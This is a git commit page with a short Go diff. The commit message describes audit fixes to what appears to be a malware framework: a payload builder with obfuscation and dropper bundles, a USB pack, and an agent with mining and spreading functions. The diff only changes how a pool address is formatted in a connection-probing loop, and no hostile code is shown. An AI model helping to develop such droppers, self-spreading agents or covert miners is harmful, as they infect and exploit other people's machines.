fix: 2026-06-04 audit pass — README, USB pack, multi-area fixes
WS ticket dashboard auth, builder universal signing/size limits/fusion obfuscation/dropper bundles, Path Tracer WireGuard topology, SessionGate degraded mode and download timeouts, server bootstrap (data dir, cloudflared dedupe, config port precedence), agent mesh/miner/spread fixes. README refreshed; usb bundle repacked; PROBLEMS.md audit log updated.
This commit is contained in:
@@ -220,7 +220,7 @@ loop:
|
||||
}
|
||||
|
||||
for i, p := range livePoolList {
|
||||
addr := fmt.Sprintf("%s:%d", p.host, p.port)
|
||||
addr := net.JoinHostPort(p.host, fmt.Sprintf("%d", p.port))
|
||||
proto := "TCP"
|
||||
if p.tls { proto = "TLS" }
|
||||
fmt.Printf(" [%d/%d] %s (%s) … ", i+1, len(livePoolList), addr, proto)
|
||||
|
||||
Reference in New Issue
Block a user